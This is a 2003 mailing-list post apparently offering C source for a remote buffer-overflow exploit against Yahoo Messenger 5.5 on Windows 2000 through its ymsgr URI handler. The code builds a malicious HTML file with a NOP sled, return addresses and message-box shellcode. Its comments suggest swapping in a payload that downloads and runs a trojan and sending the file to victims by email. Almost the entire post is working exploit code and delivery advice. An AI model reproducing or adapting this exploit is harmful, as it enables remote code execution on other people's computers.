[VulnWatch] Yahoo Messenger 5.5 exploit for win2k

From: bob (bob_at_dtors.net)
Date: 07/12/03

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    Date: Sat, 12 Jul 2003 11:33:40 +0100
    
    
    

    /* Yahpoo.c by bob@dtors.net [www.dtors.net] [DSR]
     *
     * Why Yahoo Messenger have not fixed this vulnerbility
     * I dont know...but either way they are stupid!
     *
     * This exploit has been tested on:
     * Yahoo Messenger 5,5,0,1246
     * Yahoo Module 5,5,0,454
     *
     * For:
     * Windows 2000 Professional 5.0.2195 SP3
     *
     * Rave@dtors.net has released a windows [exe] version of this
     * exploit but for Windows XP Pro SP1.
     * So both targets are vulnerable XP/2k...some addresses might need changing.
     *
     * Problems that may occur:
     *
     * The addresses used may vary from box to box..so they might need changing.
     * The stack may keep on changing the location of your shellcode address..you
     * need to hit a static sector that will not alternate. [this is the reason we jmp]
     * There exist two crashes...the first one we bypass..this is the access violation
     * when you hit the nop sled the first time round. The second crash is where we
     * hit the nop sled...so dont get confused between the 2.
     *
     * The shellcode used here...will not do anything malicious..just opens a popup box
     * You can change this shellcode to something else...but the buffer is not very big
     * so there is no chance of a bind shell or anything.
     * Sloth from nopninjas.com has a shellcode that will download a trojan
     * and execute it. Nice and small as well ;)
     *
     * Thats about it...this exploit will lead to remote command execution on the
     * victim. Bare in mind this is triggered via bad URI handling...and the victim
     * needs to actually view the evil html file..this can be done automatically via
     * email >:)
     *
     * Big Lovin to rica.
     * Thanks to rave for his time.
     * Greetz:
     * mercy, Redg, opy, phreez, eSDee, ilja, looney, The_itch, angelo, inv, kokanin,
     * macd, SiRVu|can, Sally, Lucipher, gloomy, phaze, uproot, b0f.
     * special thanks to sloth@nopninjas
     *
     *
     * bob@dtors.net www.dtors.net
     */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #define MessageBoxA "\x1d\x97\x53\x01"

    char ret[8]= "\xD5\x96\x7A\x01";

    unsigned char win32_msgbox[] = {
        "\xEB\x19\x5E\x33\xC9\x89\x4E\x05\xB8" MessageBoxA "\x2D\x01\x01"
        "\x01\x01\x8B\x18\x6A\x10\x56\x56\x51\xFF\xD3\xE8\xE2\xFF\xFF\xFF"
        "\x62\x6f\x62\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    };

    int main(int argc,char *argv[])
    {
     FILE *evil;
     char *shellcode = win32_msgbox;
     unsigned char buffer[5000];
     int offset=320;

                    fprintf(stdout, "\n\tYahPoo.c By bob.\n");
             fprintf(stdout, "Remote Exploit for Yahoo! Messenger 5.5\n");
             fprintf(stdout, "\tDSR-[www.dtors.net]-DSR\n\n");

                    fprintf(stdout,"Makin' da EbUL HTML File... ");
      if ((evil =fopen("yahoo.html","w"))==NULL){
       fprintf(stderr,"Failed\n");
       exit(1);
       } else {
       fprintf(stderr,"Opened!\n");
       }

     

     memset(buffer,0x00,offset+32+strlen(shellcode));
      memset(buffer,0x90,offset);

     memcpy(buffer+offset,ret,4);
     memcpy(buffer+offset+4,shellcode,strlen(shellcode));

            buffer[264] = 0xD4; //address of &shellcode
            buffer[265] = 0x96;
            buffer[266] = 0x7A;
            buffer[267] = 0x01;
            
            buffer[272] = 0xF5; //jmp 0xc [msvcrt.dll]
     buffer[273] = 0x01;
     buffer[274] = 0x01;
     buffer[275] = 0x78;

     fprintf(evil,"<html>");
     fprintf(evil,"<title>Bought to you by dtors.net!</title>\n");
     fprintf(evil,"<B>Dtors Security Research (DSR)</B>\n");
     fprintf(evil,"<p>Yahoo Messenger 5.5 exploit....</p>\n");
     fprintf(evil,"<pre>");
     fprintf(evil,"<a href=%cymsgr:call?%s%c>!EbUL Link!</a></body></pre></html>\x00\x00\x00",0x22,buffer,0x22);
     fclose(evil); // <-- closing yahoo.html
     
     fprintf(stdout,"\nDa ebUL HTML file is >>yahoo.html<<\nEnjoy!\nwww.dtors.net\n\n");

      }

     

    
    



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